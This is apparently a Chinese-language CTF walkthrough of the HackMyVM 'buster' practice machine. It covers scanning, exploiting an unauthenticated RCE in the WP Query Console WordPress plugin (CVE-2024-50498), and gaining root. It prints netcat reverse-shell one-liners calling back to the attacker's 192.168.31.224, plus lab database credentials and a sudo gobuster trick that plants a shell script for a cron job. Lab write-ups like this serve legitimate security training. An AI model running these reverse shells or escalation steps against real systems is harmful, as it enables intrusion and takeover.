hackmyvm靶机：buster

简介

hackmyvm是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://hackmyvm.eu/

1.在官网搜索你想要的镜像,然后下载

2.下载好后解压得到.ova的文件，右击选择VMware或者Oracle VirtualBox进行打开

3.在弹出的框中，选择存放的位置，然后点击导入

4.最后等待导入完成，然后启动该虚拟机就可以了

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth0 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.31.72后使用namp扫描靶机。

nmap 192.168.31.72 -A -O -p-

开放22，80端口。80端口是WordPress。

直接扫一下。

wpscan --url http://192.168.31.72 --plugins-detection aggressive

wp-query-console这是个什么玩意。搜索了一下发现这个wp-query-console有漏洞的。

GitHub - RandomRobbieBF/CVE-2024-50498: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution

抓包改一下就可以执行任意代码了。

看了一下还有被ban掉的函数。怪不得我刚刚弹不上shell。

shell_exec('nc -e /bin/bash 192.168.31.224 4444');

连上去之后看了一下wpconfig，给了个mysql的用户和密码。

ll104567
thehandsomeguy

登录mysql之后一顿找最后是找到两个用户和密码，但是这个密码也要爆破一下。就爆破这个welcome就好了。因为home下没有另一个的。

welcome
104567

跑一下脚本。

直接提权到root。研究一下。还有一个定时脚本。

靶机

echo 'nc -e /bin/bash 192.168.31.224 1234' > /tmp/run.sh

chmod +x /tmp/run.sh

echo 'tmp/run.sh' > a.txt

kali机

mkdir tmp

cd tmp

echo ''>run.sh

cd ..

python -m http.server

nc -lvvp 1234

靶机

sudo gobuster -u http://192.168.31.224:8000 -w a.txt -n -o /opt/.test.sh